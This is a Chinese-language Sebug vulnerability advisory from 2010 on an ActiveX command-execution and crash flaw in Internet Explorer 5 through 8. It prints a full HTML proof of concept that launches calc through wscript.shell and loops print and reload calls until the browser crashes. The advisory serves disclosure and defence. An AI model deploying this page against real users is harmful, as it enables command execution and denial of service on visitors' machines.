Internet Explorer 5 Internet Explorer 6 Internet Explorer 7 Internet Explorer 8
SSV ID:
19286
SEBUG-Appdir:
Internet Explorer
发布时间:2010-03-18
信息提交:
liscker (liscker_at_hotmail.com)
影响版本:
漏洞描述:
该漏洞存在于ActiveX控件中. 攻击者可以构造恶意页面诱使用户访问,恶意代码可运行任何Windows命令,消耗大量内存,导致访问者IE浏览器崩溃。
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<html> <title>Liscker@hotmail.com</title> <head> <script type="text/javascript"> function sucks() { var shell=new ActiveXObject("wscript.shell"); shell.Run("calc", 1); } function asheesh() { sucks(); window.οnerrοr=new Function("history.go(0)"); window.print(); asheesh(); } asheesh(); </script> </head> <body onLoad="asheesh()"></body> </html>
SEBUG安全建议:
禁止ActiveX控件自动运行。 不要手工运行该类控件运行。
// sebug.net [2010-03-18]